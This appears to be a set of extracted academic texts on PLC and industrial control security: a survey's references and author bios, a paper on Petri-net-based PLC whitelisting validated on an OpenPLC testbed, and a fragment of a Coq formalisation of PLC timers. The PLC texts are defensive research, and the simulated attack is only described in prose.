http://www.mdpi.com/2073-8994/7/3/1176 [30] E. d mk , G. Jakab czki, and P. T. Szemes, Proposal of a secure Modbus RTU communication with Adi Shamir s secret sharing method, Int. J. Electron. Telecommun. , vol. 64, no. 2, pp. 107 114, 2018. [31] R. Huang, F. Liu, and P. Dongbo, Research on OPC UA security, in Proc. 5th IEEE Conf. Ind. Electron. Appl. , Taichung, Taiwan, Jun. 2010, pp. 1439 1444. [32] M. Majdalawieh, F. Parisi-Presicce, and D. Wijesekera, DNPSec: Distributed network protocol version 3 (DNP3) security framework, inAdvances in Computer, Information, and Systems Sciences, and Engineering , K. Elleithy, T. Sobh, A. Mahmood, M. Iskander, and M. Karim, Eds. Dordrecht, The Netherlands: Springer, 2006,pp. 227 234. [33] N. Rodo le, K. Radke, and E. Foo, Real-time and interactive attacks on DNP3 critical infrastructure using scapy, in Proc. 13th Aust. Inf. Security Conf. , Sydney, NSW, Australia, 2015, pp. 67 70. [34] C. Singh, A. Nivangune, and M. Patwardhan, Function code based vulnerability analysis of DNP3, in Proc. IEEE Int. Conf. Adv. Netw. Telecommun. Syst. , Bengaluru, India, 2016, pp. 1 6. [35] C. Cremers, M. Dehnel-Wild, and K. Milner, Secure authentication in the grid: A formal analysis of DNP3: SAv5, in Proc. Eur. Symp. Res. Comput. Security , 2017, pp. 389 407. [36] G. Gilchrist, Secure authentication for DNP3, in Proc. IEEE 21st Century Power Energy Soc. Gen. Meeting Convers. Del. Elect. Energy , Pittsburgh, PA, USA, Jul. 2008, pp. 1 3. [37] R. Amoah, Formal security analysis of the DNP3-secure authentication protocol, Ph.D. dissertation, School Elect. Eng. Comput. Sci., Sci. Eng.Faculty, Queensland Univ. Technol., Brisbane, QLD, Australia, 2010. [38] R. Amoah, S. Camtepe, and E. Foo, Securing DNP3 broadcast com- munications in SCADA systems, IEEE Trans. Ind. Informat. , vol. 12, no. 4, pp. 1474 1485, Aug. 2016. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. VOLKOV A et al. : SECURITY CHALLENGES IN CONTROL NETWORK PROTOCOLS: SURVEY 639 [39] J. Hong, C.-C. Liu, and M. Govindarasu, Detection of cyber intrusions using network-based multicast messages for substation automation, inProc. Innov. Smart Grid Technol. , Washington, DC, USA, Feb. 2014, pp. 1 5. [40] M. T. A. Rashid, S. Yussof, Y . Yusoff, and R. Ismail, A review of security attacks on IEC61850 substation automation system network, inProc. 6th Int. Conf. Inf. Technol. Multimedia , Putrajaya, Malaysia, Nov. 2014, pp. 5 10. [41] B. Kang et al. , Investigating cyber-physical attacks against IEC 61850 photovoltaic inverter installations, in Proc. IEEE 20th Conf. Emerg. Technol. Factory Autom. (ETFA) , Sep. 2015, pp. 1 8. [42] I. A. Siddavatam and F. Kazi, Security assessment framework for cyber physical systems: A case-study of DNP3 protocol, in Proc. IEEE Bombay Section Symp. (IBSS) , Sep. 2015, pp. 1 6. [43] N. Kush, M. Branagan, E. Foo, and E. Ahmed, Poisoned GOOSE: Exploiting the GOOSE protocol, in Proc. Aust. Inf. Security Conf. , Jan. 2014, pp. 17 22. [Online]. Available: https://eprints.qut.edu.au/66227/ [44] J. Hoyos, M. Dehus, and T. X. Brown, Exploiting the GOOSE protocol: A practical attack on cyber-infrastructure, in Proc. IEEE Globecom Workshops , Anaheim, CA, USA, Dec. 2012, pp. 1508 1513. [45] A. Shahzad, S. Musa, A. Aborujilah, and M. Irfan, The SCADA review: System components, architecture, protocols and future security trends, Amer. J. Appl. Sci. , vol. 11, pp. 1418 1425, Aug. 2014. [46] D. Kang and R. J. Robles, Compartmentalization of protocols in SCADA communication, Int. J. Adv. Sci. Technol. , vol. 8, pp. 27 36, Jul. 2009. [47] Communication network dependencies for ICS/SCADA systems, Eur. Union Agency Netw. Inf. Security, Heraklion, Greece, Rep. TP-06-16- 344-EN-N, 2017. [48] IEEE Standard for Electric Power Systems Communications-Distributed Network Protocol (DNP3) , IEEE Standard 1815-2012, 2012. [49] T. Radu and S. Mircea, Evaluation of DES, 3 DES and AES on win- dows and unix platforms, in Proc. Int. Joint Conf. Comput. Cybern. Tech. Informat. ,T i m i soara, Romania, May 2010, pp. 119 123. [50] M. Stevens, New collision attacks on SHA-1 based on optimal joint local-collision analysis, in Advances in Cryptology EUROCRYPT 2013 , T. Johansson and P. Q. Nguyen, Eds. Heidelberg, Germany: Springer, 2013, pp. 245 261. [51] M. Abrams and J. Weiss, Malicious control system cyber security attack case study Maroochy water services, Appl. Control Solut., MITRECorporat., McLean, V A, USA, Rep. 08-1145, 2008. [52] A. Saxena, O. Pal, and Z. Saquib, Public Key Cryptography Based Approach for Securing SCADA Communications . Heidelberg, Germany: Springer, 2011, pp. 56 62, doi: 10.1007/978-3-642-19542-6_10 . [53] L. Pi tre-Cambac d s and P. Sitbon, Cryptographic key management for SCADA systems-issues and perspectives, in Proc. Int. Conf. Inf. Security Assurance (ISA) , Apr. 2008, pp. 156 161. [54] C. W. Ten, G. Manimaran, and C. C. Liu, Cybersecurity for critical infrastructures: Attack and defense modeling, IEEE Trans. Syst., Man, Cybern. A, Syst., Humans , vol. 40, no. 4, pp. 853 865, Jul. 2010. [55] A. A. Cardenas, T. Roosta, and S. Sastry, Rethinking security prop- erties, threat models, and the design space in sensor networks: A case study in SCADA systems, Ad Hoc Netw. , vol. 7, no. 8, pp. 1434 1447, Nov. 2009, doi: 10.1016/j.adhoc.2009.04.012 . [56] IEC SC 65A, Functional Safety of Electrical/Electronic/Programmable Electronic Safety-related Systems , IEC Standard 61508, 2010. [57] J. Cai, Y . Zheng, and Z. Zhou, Review of cyber-security challenges and measures in smart substation, in Proc. Int. Conf. Smart Grid Clean Energy Technol. , Chengdu, China, Oct. 2016, pp. 65 69. [58] (2010). STI Graduate Student Research, as part of the Information Security Reading Room . [Online]. Available: https://www.sans.org/ reading-room/whitepapers/intrusion/paper/33513 [59] U. K. Premaratne, J. Samarabandu, T. Sidhu, R. Beresh, and J. C. Tan, An intrusion detection system for IEC61850 automated substations, IEEE Trans. Power Del. , vol. 25, no. 4, pp. 2376 2383, Oct. 2010. [60] U. K. Premaratne, J. Samarabandu, T. Sidhu, R. Beresh, and J. C. Tan, Security analysis and auditing of IEC61850-based automated sub-stations, IEEE Trans. Power Del. , vol. 25, no. 4, pp. 2346 2355, Oct. 2010. [61] A. Nagarajan and C. D. Jensen, A generic role based access control model for wind power systems, J. Wireless Mobile Netw. Ubiquitous Comput. Depend. Appl. , vol. 1, no. 4, pp. 35 49, 2010. [62] R. Schlegel, S. Obermeier, and J. Schneider, Assessing the security of IEC 62351, in Proc. 3rd Int. Symp. ICS SCADA Cyber Security Res. , Ingolstadt, Germany, 2015, pp. 11 19.[63] F. Hohlbaum, M. Braendle, and F. Alvarez, Cyber security practical considerations for implementing IEC 62351, in Proc. Protect. Autom. Control World Conf. , 2010. [64] M. Strobel, N. Wiedermann, and C. Eckert, Novel weaknesses in IEC 62351 protected smart grid control systems, in Proc. IEEE Int. Conf. Smart Grid Commun. (SmartGridComm) , Nov. 2016, pp. 266 270. [65] S. Fries, H. J. Hof, and M. Seewald, Enhancing IEC 62351 to improve security for energy automation in smart grid environments, in Proc. IEEE 5th Int. Conf. Internet Web Appl. Services , 2010, pp. 135 142. [66] E. D. Knapp and J. T. Langill, Industrial Network Security: Securing Critical Infrastructure Networks for Smart Grid, SCADA, and Other Industrial Control Systems . Waltham, MA, USA: Elsevier Sci., 2014. [67] D. Moore, C. Shannon, D. J. Brown, G. M. V oelker, and S. Savage, Inferring Internet denial-of-service activity, ACM Trans. Comput. Syst. , vol. 24, no. 2, pp. 115 139, 2006. [68] G. D n, H. Sandberg, M. Ekstedt, and G. Bj rkman, Challenges in power system information security, IEEE Security Privacy , vol. 10, no. 4, pp. 62 70, Jul./Aug. 2012. [69] K. Choi et al. , Intrusion detection of NSM based DoS attacks using data mining in smart grid, Energies , vol. 5, no. 10, pp. 4091 4109, 2012. [Online]. Available: http://www.mdpi.com/1996-1073/5/10/4091 [70] F. Cleveland, IEC 62351 security standards for the power system information infrastructure, IEC, Geneva, Switzerland, Rep. IEC TC57 WG15, 2012. [71] J. G. Wright and S. D. Wolthusen, Limitations of IEC 62351-3 s public key management, in Proc. IEEE 24th Int. Conf. Netw. Protocols (ICNP) , Singapore, Nov. 2016, pp. 1 6. [72] J. H. Graham and S. C. Patel, Security considerations in SCADA communication protocols, Intell. Syst. Res. Lab., Dept. Comput. Eng.Comput. Sci., Univ. Louisville, Louisville, KY , USA, Rep. TR-ISRL- 04-01, 2004. [73] M. Kerkers, J. Chromik, A. Remke, and B. Haverkort, A tool for ger- erating automata of IEC60870-5-104 implementations, in Proc. 19th Int. GI/ITG Conf. Meas. Model. Eval. Comput. Syst. , 2018, pp. 1 5. [74] C. L. Beaver, D. R. Gallup, W. D. Neumann, and M. D. Torgerson, Key management for SCADA, Sandia Nat. Lab., Albuquerque, NM, USA,Rep. SAND2001-3252, 2002. Anna Volkova received the Diploma degree in information systems security from Peter the Great St. Petersburg Polytechnic University and the Masterof Computer Science degree in information security from the University of Passau. She contributed over 5 network security, software-de ned networking security, and smart grid security research projects in the last three years. Michael Niedermeier has been a Research Associate with the Chair of Computer Networks and Computer Communications and with the Institute of IT Security and Security Law, University of Passau since 2009. His mainresearch areas focus on novel dependability enhancements, security, and func-tional safety in distributed systems such as the smart grid. He scienti cally contributed to EU EFRE SECBIT, EU FP7 SEC-2013.2.5-4 HyRiM, and the East-Bavarian Centre of Internet Competence supported by Bavarian Ministryof Economic Affairs and Media, and Energy and Technology. He was anActive Member of both the EURO-NF and EINS networks of excellence. Robert Basmadjian received the Ph.D. degree in data replication from the University of Toulouse. In 2009, he joined the University of Passau as aPost-Doctoral Fellow. He was a Scienti c and Technical Contributor to EU FP7 FIT4Green and ALL4Green projects related to Demand Response in data centers as well as to H2020 Electri c project. His main research interestsare large-scale energy management systems (smart grid), and performancemodeling of computing systems (queuing theory). He has over 25 scienti c publications in the above areas. He was an Active Member of WG 2 and 3 of COST ACTION 804, EURO-NF, and EINS. Hermann de Meer received the Ph.D. degree from the University Erlangen-Nuremberg, Germany, in 1992 and the Habilitation degree from Hamburg University, Germany. He has been appointed as a Full Professorof computer science with the University of Passau, Germany, since 2003.He is heading the Computer Networking Lab and co-heading the Institute of IT Security and Security Law. His interests of research include network virtualization, digitization of energy systems, IT security of critical infras-tructures, and distributed control and optimization. He is member of theACM and of the Gesellschaft f r Informatik, and a fellow of the Deutsche Forschungsgemeinschaft. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply.
On_Experimental_validation_of_Whitelist_Auto-Generation_Method_for_Secured_Programmable_Logic_Controllers.pdf
This paper considers a whitelisting system for programmable logic controllers (PLCs). In control systems, controllers are final fortresses to continues the operation of field devices (actuators/sensors), but they are fragile with respect to malware and zero-day attacks. One of the countermeasures applicable for controllers is a whitelisting system which registers normal operations of controller behavior in a whitelist to detect abnormal operations via a whitelist. The previous research of the current author proposed a PLC whitelisting system with a control via a ladder diagram (LD). LD representations have a wide applicability because LDs can be implemented for all PLCs and security functions without hardware/firmware updates. However, the current status requires that all instances are manually entered in the whitelist. In this talk, we show how the setting up of the can be automatized whitelist from the PLC behavior. This paper introduces an auto-generation approach for the whitelist using sequential function chart (SFC) instead of the LD. SFC and LD are compatible representations for the PLC. Using Petri Net modeling, this paper proposes how to generate the whitelist from the SFC and how to detect abnormal operations via the whitelist. We call the SFC-based approach the model-based whitelist, the Petri Net based approach the model-based detection. Further, this paper carries out an experimental validation of the algorithms using an OpenPLC based testbed system.
On Experimental validation of Whitelist Auto- Generation Method for Secured Programmable Logic Controllers Shintaro Fujita Dept. of Mechanical Engineering and Intelligent Systems University of Electro-Communications Tokyo, Japan [email protected] Kenji Sawada Info-Powerd Energy System Research Center University of Electro-Communications Tokyo, Japan [email protected] Kosuke Hata Dept. of Mechanical Engineering and Intelligent Systems University of Electro-Communications Tokyo, Japan [email protected] Seiichi Shin Dept. of Mechanical Engineering and Intelligent Systems University of Electro-Communications Tokyo, Japan [email protected] Akinori Mochizuki Dept. of Mechanical Engineering and Intelligent Systems University of Electro-Communications Tokyo, Japan [email protected] Shu Hosokawa Control System Security Center Miyagi, Japan [email protected] Keywords PLC, Security, Whitelist, Petri Net I. INTRODUCTION Control systems face a lot of cyber-attacks [1], such Stuxnet, Wannacry, Crashoverride, Badrabbit [2][3][4]. The typical control system consists of SCADA (Supervisory Control And Data Acquisition), network switches, controllers and field devices. Initially, it is supposed that malicious attackers target SCADA and penetrate its vulnerabilities because software update causing the system restart is avoided for the control system availability and Windows OS version of SCADA often remains old. Furthermore, recent malware directly targets controllers (PLC blaster and Modbus stager) [5][6]. Controller is a final fortress of control systems. Even if SCADAs stop suddenly, controllers themselves continues the operation of field devise. If controllers stop, control systems cannot be operated by SCADAs. Therefore, we need countermeasures focusing on controllers [7]. The main functions of the controller are operating field devices and communicating with other devices. System resources for the security function are not high, then it is not easy to apply anti-virus software to controllers directly. The typical anti-virus software is based on the blacklisting system in which abnormal behaviors caused by malwares/worms are listed and behaviors of application commands are always checked. This system load of blacklist checking is very high for controllers. Further, the blacklisting system requires frequent updates of pattern files to maintain its defensive strength. Therefore, it is supposed that the whitelisting system is familiar with control systems rather than the blacklisting system [8][9]. The whitelisting system registers normal application/network commands and normal network information (IP, MAC address) and accepts/approves only commands/information on the list. Its system load is less than that of the blacklisting system. The whitelist update timing is restricted to the system maintenance changing the control system operation. Motivated by above, the current authors study a whitelisting system of controller, especially, Programmable Logic Controller (PLC). PLCs are widely used in industrial control systems, so enhancing security functions of PLC directly leads to enhancing those of industrial control systems. Further, our proposed whitelist of PLC [10] is expressed by LD (Ladder Diagram) which is one of most presently available PLC programming language. Using LD, our whitelisting function does not need to change the firmware of PLC and then is applicable for various PLCs. 978-1-5090-6684-1/18/$31.00 2018 IEEE 2385 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:41 UTC from IEEE Xplore. Restrictions apply. However, the current method requires that all instances are manually entered in the whitelist. Since a number of PLC is implemented in an industrial control system, even if each workload of the whitelist design is not high, the entire workload may be an enormous. Therefore, this paper considers how the setting up of the can be automatized whitelist from the PLC behavior. This paper introduces an auto-generation approach for the whitelist using SFC (Sequential Function Chart) instead of the LD. SFC and LD are compatible representations for the PLC. The whitelist designed from SFC is implemented into PLC as the LD form. Using Petri Net modeling, this paper proposes how to generate the whitelist from the SFC and how to detect abnormal operations via the whitelist. We call the SFC-based approach the model-based whitelist, the Petri Net based approach the model-based detection. Further, this paper carries out an experimental validation of the algorithms using an OpenPLC based testbed system [11]. II. CONTROL SYSTEM AND TESTBED SYSTEM Figure 1 shows a typical control system architecture in critical infrastructures and industrial systems. Control systems are composed of computers such as HMI (Human Machine Interface) and Engineering PC, network switches, controllers such as PLC and DCS (Distributed Control System), and field devices such as actuator and sensor. Along with the recent IoT (Internet of Things) developments, a number of control systems are managed and monitored over the network. Figure 1. Typical control system The previous research of the current author [11] developed a testbed system focusing on HMI, network switch, PLC, and field devices. Figure 2 shows a controller in the testbed system is made with OpenPLC [12]. OpenPLC is OSS (Open Source Software) developed by Thiago Rodrigues Alves. The computer with OpenPLC and I/O device simulates PLC functions. OpenPLC supports Microsoft Windows and Linux as computer OS and operates on computers as a WEB application using Node.js. The implementation of PLC control programming is realized by uploading ST (Structured Text) through the WEB page. I/O devices control field devices according to the computer commands. OpenPLC supports the following I/O devices: Raspberry Pi [13], Arduino and compatible boards [14], UniPi Industrial Platform [15], Modbus Slave Devices [16], ESP8226 [17] and PiXtend [18] Figure 2. OpenPLC system PLCopen Editor, OpenPLC recommends as a development environment supports five PLC languages such as LD, ST, SFC (Sequential Function Chart), FBD (Function Block Diagram) and IL (Instruction List). The languages except for ST are translated into ST by PLCopen Editor. Figure 3 shows the testbed system. We set two computers. The first is for OpenPLC and second is for HMI and Cracker PC. The two computers are connected by Modbus/TCP which is an open industrial protocol. Figure 4 shows an I/O device made by Arduino MEGA 2560. Figure 5 shows the robot arm. Arduino MEGA 2560 connects with the robot arm and the control panel. the panel has three switches (SW1, SW2 and SW3) and one LED. SW1 is the power button of the robot arm, SW2 is the stop-start switch of the arm, and SW3 is the reset switch of the arm operation. Figure 3. Testbed system Figure 4. Arduino MEGA 2560 and circuit Figure 5. Robot Arm The testbed system simulates the component conveyer system in factory automation and the robot arm conveys block type components. The robot arm is activated when SW1 is turned on. Start/Stop of the conveying task is controlled by SW2 turn on/off. The robot arm is returned to the original position when SW3 is turned on at the stop of the conveying task. III. SFC In this paper, we select SFC which is one of five PLC languages. SFC describes the state transition of control tasks, in other words, models the state transition of a control system. We show an example of SFC program in Figure 6. SFC is mainly constructed by four elements of Step, Initial Step, Transition and Action Block as shown in Figure 7. 2386 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:41 UTC from IEEE Xplore. Restrictions apply. Figure 6. Example of SFC program Figure 7. SFC components Step of SFC has active or inactive states and its initial state is inactive. Step is connected with Action Blocks and Transitions. Step executes the connected Action Blocks when it is active by the connected Transition. The behavior of Initial Step is similar with Step except that its initial state is active. The source or destination of each Transition is (Initial) Step. Each Transition has a firing rule and fires if the firing rule is true and the source of (Initial) Step is active. The fire of Transition puts the state of the source (Initial) Step into inactive, and then puts the state of the destination (Initial) Step into active. In Figure 6, if T0 becomes true, then Step0 becomes inactive and Step1 becomes active. Action Block has two elements: action and qualifier. The action is a control program using LD, ST, FBD and IL. The qualifiers control an execution timing of the action elements and have 9 types such as N (Non-stored), R (Reset), S (Set), L (time Limited), D (time Delayed), P (Pulse), SD (stored and time Delayed), DS (Delayed and Stored) and SL (Stored and time Limited). Table 1 shows execution timing of the qualifiers. Table 1. Available qualifiers [19] Figure 8 shows the control program of the testbed system using SFC. SW1, SW2 and SW3 in Figure 4 are associated with each Boolean variable ( r_power_switch , r_switch and r_reset_switch ) in the control program. ON and OFF of the switches are linked to True and False of the variables. The variable isTargetAngle is true when the robot arm moves to the target positions. Table 2 shows the relation between Steps and the testbed system status. Also, the detailed procedure of Step3 is as follows: 1. The arm moves to the front of the block. 2. The arm moves to the grasping position. 3. The arm grasps the block. 4. The arm uplifts the block. 5. The arm conveys the block to the releasing position. 6. The arm releases the block. Figure 8. SFC program of the testbed system Table 2. Relation between Step and Testbed Status Qualifier Execution Timing N The action actives as long as the step is active. R The action is deactivated. S The action is activated and remains active until its reset L The action is a ctivated for a certain time. D The action becomes active after a certain time as long as the step is still active. P The action is executed just one time if the step is active. SD The action is activated after a certain time and remains active until its reset. DS The action is activated after a certain time as long as the step is still active and remains active up to a reset SL The action is activated for a certain time. Step Testbed Status Step0 Initial status Step1 Wake up the robot arm Step2 Standby or Stop of transportation work Step3 Conveys blocks Step4 Return the robot arm to the original position Step5 Return the robot arm to the original position and power-off the robot arm 2387 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:41 UTC from IEEE Xplore. Restrictions apply. IV. WHITELIST FUNCTION The whitelist function registers normal operations on the list (whitelist) and rejects the operation which is not registered on the list. In control systems, normal operations of communication commands and executive orders of actuator and sensor are subject to their blueprints. Then, the whitelisting system detects zero-day attacks which deviate from the blueprints. Also, its system load is less than that of the blacklisting system. The previous work [3] of the current authors implements this whitelist function to PLC, as a PLC anomaly detection method. This method, we call ladder type whitelist or white sequence, registers execution orders of actuators and sensors on the list. The list modeled by PN (Petri Net) [20] and its state transition and its state constraint rules are converted to LD. If the rules are not satisfied, the method detects anomaly execution orders. Almost PLCs address LD, so the whitelist function is applicable to almost PLCs without updating firmware and improving hardware. The previous work [4] applies the ladder type whitelist to a servomotor control program of the testbed system. Figure 9 shows the PN model of Step3 Conveys blocks . Figure 9. PN model of servomotor control program PN is a bipartite directed graph and consists of Places, Transitions, Tokens and Arcs. Consider the state of PN retaining Tokens. Number of retained Token is limited by 0 . is an arbitrary natural number and the testbed system is = 1. It is called fire that Transition change PN state. Figure 10 shows the LD program for the state transition of Place P1 (ladder list). Figure 11 shows the LD program for the constraint condition of Place P1. Abnormal operations are state transitions violating constraint condition of Figure 11 (ladder detector). The combination of the list and the detector is the ladder type whitelist. Figure 10. The state transition of Place P1 Figure 11. The constraint condition of Place P1 The ladder type whitelist requires the PN modeling of the control program. meanwhile, the previous research does not address an efficient modeling method of normal operation. This paper introduces an auto-generation approach for the PN model using an SFC instead of the LD. SFC and LD are compatible representations for the PLC and are based on IEC (International Electrotechnical Commission) 61131-3. V. AUTO-GENERATION METHOD First, we consider the list design from SFC. PN has four elements: Places, Transitions, Tokens and Arcs. A one-to-one mapping between SFC and PN is shown in Table 3. Table 3. One-to-one mapping between SFC and PN Figure 12 shows the PN model of the testbed system. This model is converted from the SFC program subject to the one-to- one mapping. Table 4 shows the relation between Steps of SFC and Places of PN model. Table 5 shows firing rules of each Transition in the model. We call the PN model with the one-to- one mapping as the model based whitelist. Figure 12. PN model of the testbed system Table 4. Mapping of Steps and Places SFC Petri Net Step Place Transition Transition state of Place Token Arc Arc Step Place Step0 P1 Step1 P2 Step2 P3 Step3 P4 Step4 P5 Step5 P6 2388 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:41 UTC from IEEE Xplore. Restrictions apply. Table 5. Firing rules of PN's Transition Next, we consider the detector design against the model- based whitelist. Each Step is controlled by Transitions, then, it is natural to design the detector observing Transitions. But, Transitions of SFC has an issue to be used for the detector. Table 5 shows that T2, T8 and T9 are the same firing rule, T4 and T7 are also the same firing rule even if the robot arm motions of each source step differ as shown in Table 2. We have to discern Transitions with the same firing rule and the different source step without observing Steps. Then, this paper solves this problem. The basic idea is to derive a firing rule of Transition without Step information. Denote the state of PN at step by and consider the state space equation of PN given by = + (1) where is an incidence matrix and is given by = . is an incidence matrix from Transition to Place and is an incidence matrix from Place to Transition. expresses which Step the control logic takes at step . is input the vector and express which Transition fires at step . For example, the incidence matrix can be auto-generated from PN using PN tool PIPE2 [21]. Since 0 always holds in PN, a typical firing rule is given by . (2) This rule includes Step information and then we eliminate Step information from (2). In the testbed system, the number of Transition firing and active Step is only one at the same time. That is, and is unit vectors. Using this fact, the state of PN at step is given by = . (3) Using (1) and (3), firing rule (2) is transformed to = + = + = . (4) Therefore, the firing rule without Step information, we call the model-based detection, is . (5) The model-based detection allows us to determine only one fired Transition even if some Transitions with the same firing rule exist in the PN model. Table 6 shows the result of discerning the fired Transition in the PN model. In other words, to register the previous fire with memory function of LD is needed in order to auto-generate ladder type whitelist. Table 6. Discernment of fired Transition VI. EXPERIMENTAL VERIFICATION We verified the validity of the model-based whitelist and model-based detection carrying out the simulated attack. Using the ladder type whitelist, a PN model is converted to LD focused on the Transitions. Figure 13 (ladder list) shows the state transition of Transition T2. The difference with the ladder type whitelist [10] is the area of dotted line and doublet line. Using the ladder list and detector is the same as the previous research, but the difference is those expression methods. The area of dotted line due to the previous fire of T2 in Table 6 and the area of doublet line due to register the previous fire with the memory function of LD. Figure 14 (ladder detector) shows the constraint condition of T2, T8 and T9 is converted from Discernment of fired Transition. Figure 13. The state transition of T2 Figure 14. The constraint condition of T2, T8 and T9 The other Transitions convert to LD similar to Figure 13 and Figure 14. We implemented these LDs to the testbed system and carried out the simulated attack. We assumed that an unknown device connects with the control network and attacks the PLC. The cracker changes the value of isTargetAngle to True taking over Modbus/TCP commands, in other words, the firing rule of T2, T8 and T9 are attacked. Figure 15 shows the testbed system status on normal operations. The figure shows three graphs. The first graph is the time sequence for fired Transitions. The second graph is the time sequence value of isTargetAngle . The last one is the ON/OFF graph of the LED. When the ladder detector detects abnormal operations, the LED is turned ON. In normal operations, the first time of the fired T2 or T8 or T9 (at dotted line around 20 sec) is discerned T2 by previous fired Transition T1, the second time of the fired (at dotted line Transition Firing rule T1 r_power_switch = True T2 isTargetAngle = True T3 r_switch = True T4 r_power_switch = False T5 r_reset_switch = True T6 r_switch = False T7 r_power_switch = False T8 isTargetAngle = True T9 isTargetAngle = True Firing rule Previous fire Current fire isTargetAngle = True T1 T2 T4 or T7 T8 T5 T9 r_power_switch = True T2 or T6 or T9 T4 T3 T7 2389 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:41 UTC from IEEE Xplore. Restrictions apply. around 80 sec) is discerned T9 by previous fired Transition T5. Therefore, we verified the model-based whitelist functioning normally. Figure 15. Normal operations of the testbed system Next, we verify the model-based detection by simulated attacks. Figure 16 shows the testbed system status of abnormal operations. In abnormal operations, a simulation attack is occurring around 50 sec during the same normal operation. the previous fired Transition T3 is not any of T1, T4, T5 and T7. The ladder detector detected the abnormal operation by and the LED is turned ON. We verified detecting abnormal operation by model-based detection. Figure 16. Abnormal operations of the testbed system VII. CONCLUSION In this paper, we have proposed the auto-generation method of normal operations model in the testbed system using OpenPLC. We have shown that the proposed method converts simply the control program to the PN model because SFC features are utilized. We have proposed a solution to decide Transitions with the same firing rule using the previous fire of Transition. Our future work is to generalize the auto-generation method and enlarge the applicable range. This work was supported by Council for Science, Technology and Innovation (CSTI), Cross-ministerial Strategic Innovation Promotion Program (SIP), Cyber-Security for Critical Infrastructure (funding agency: NEDO). REFERENCES [1] G. Liang, The 2015 Ukraine Blackout: Implications for False Data Injection Attacks, IEEE Transactions on Power Systems 2016 [2] L. Pietre-Cambaceds, M. Tritschler and G. N. Ericsson, Cybersecurity Myths on Power Control Systems: 21 Misconceptions and False Beliefs, IEEE Transactions on Power Delivery, Vol. 26, No. 1, 161/172 (2011) [3] A. Bindra, Securing the Power Grid: Protecting Smart Grids and Connected Power Systems from Cyberattaks, IEEE Power Electronics Magazine, Vol. 4, No. 3 20/27 (2017) [4] N. Scaife, P. Travnor and K. Butler, Making Sense of the Ransomware Mess (and Planning a Sensible Path Forward), IEEE Potentials, Vol. 36, No. 6, 28/31 (2017) [5] R. Spenneberg, M. Br ggeman, H. Schwartke, PLC-Blaster: AWorm Living Solely in the PLC, BlackHat Asia, 2016 [6] Brja Merino, Modbus Stager Using PLCs as a payload/shellcode distribution system [7] T. Sasaki, K. Sawada, S. Shin, S. Hosokawa, Model Based Fallback Control for Networked Control System via Switched Lyapunov Function, IECON 2015 41st Annual Conference of the IEEE, 2000/2005 (2015) [8] Woo-suk Jung, Sung-Min Kim, Young-Hoon Goo, Myung-Sup Kim, Whitelist Representation for FTP Service in SCADA system by using Structured ACL Model, APNOMS 2016 18th Asia-Pacific, (2016) [9] E. Y. Chen, M. Itoh, A Whitelist Approach to Protect SIP Servers from Flooding Attacks, CQR 2010, 1/6 (2010) [10] A. Mochizuki, K. Sawada, S. Shin, S. Hosokawa, On Experimental Verification of Model Based White List for PLC Anomaly Detection, ASCC 2017, 1766/1771 (2017) [11] S. Fujita, K. Hata, A. Mochizuki, K. Sawada, S. Shin, S. Hosokawa, Open PLC based control system testbed for PLC whitelisting system, AROB 23rd 2018, 795/798 (2018) [12] http://www.openplcproject.com/ [13] https://www.raspberrypi.org/ [14] http://arduino.org/ [15] https://www.unipi.technoloty/ [16] http://www.modbustools.com/modbus_slave.html [17] https://startiot.telenor.com/lerning/esp8226-openrtos-and-managed-iot- cloud/ [18] http://www.pixtend.de/ [19] https://infosys.beckhoff.com/english.php?content=../content/1033/tcplcc ontrol/html/TcPlcCtrl_Languages%20SFC.htm [20] T. Murata, Petri Nets: Properties, Analysis and Applications, Proceedings of the IEEE, 77-4, 541/580 (1989) [21] http://pipe2.sourceforge.net/ 2390 Powered by TCPDF (www.tcpdf.org)Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:41 UTC from IEEE Xplore. Restrictions apply.
Formalization_and_Verification_of_PLC_Timers_in_Coq.pdf
Programmable logic controllers (PLCs) are widely used in embedded systems. A timer plays a pivotal role in PLC real-time applications. The paper presents a formalization of TON-timers of PLC programs in the theorem proving system Coq. The behavior of a timer is characterized by a set of axioms at an abstract level. PLC programs with timers are modeled in Coq. As a case study, the quiz machine problem with timer is investigated. Relevant timing properties of practical interests are proposed and proven in Coq. This work unveils the hardness of timer modeling in embedded systems. It is an attempt of formally proving the correctness of PLC programs with timer control. ed from scan cycle. Our model belongs to the third kind. Models with implicit scan cycle can be simply understood as the modeling of cyclical behavior, but the duration of each scan cycle is not considered. The reasons why we chose this are as follows: In practice, the duration of each scan cycle and the execution time of each instruction are not of greatimportance. What we concern is only the summation of durations of several adjacent scan cycles. We want to get a simpler model. If we take into account the execution time of each instruction, several auxiliary notations need to be added into the model. Though it could make our model more precise, it makes the model more complex and the reasoning more dif cult which is not necessary. In PLC, relays are used to store input, internal and output values. The modeling of scan cycle is represented by the modeling of relays. We de ne a variable Cycle as the total number of scan cycles from the start of the program. Definition Cycle := nat. After the de nition of scan cycle, there are three things to do: 1) de ne the value of each relay at each scan cycle; 2) attach time to each scan cycle; 3) determine the interpretation location of the value and time for each scan cycle. 1) Values of Relays: The values (i.e. ON and OFF) of relays change according to the cycles. In other words, they are functions from Cycle to Boolean: Definition Var := Cycle -> bool. Since Coq is a system based on intuitive logic, the results of logic computation are in the sort Prop . In order to facilitate the proof process, we use the following de nition instead: Definition Var := Cycle -> Prop. For example, given a relay rof type V ar and a cycle i, r(pred i )and(r i)are used to denote the values of relay r at (i 1)-th cycle and i-th cycle, respectively. 2) Time: Time is de ned by natural number: Definition Time := nat. Function fassociates each scan cycle with a time: Variable f : Cycle -> Time. Function fshould satisfy the monotonic property which means that the time attached to scan cycles increases strictly: Hypothesis f_monotonic:forall c, f c < f (S c). 3) Interpretations of Values and Times: The value of a relay and time at a cycle can have several interpretations. For instance, given a relay r, the values of ralong the execution of PLC program form an in nite trace which is illustrated in Fig.4. This trace alternates the I/O phase and calculation phase in nitely. The 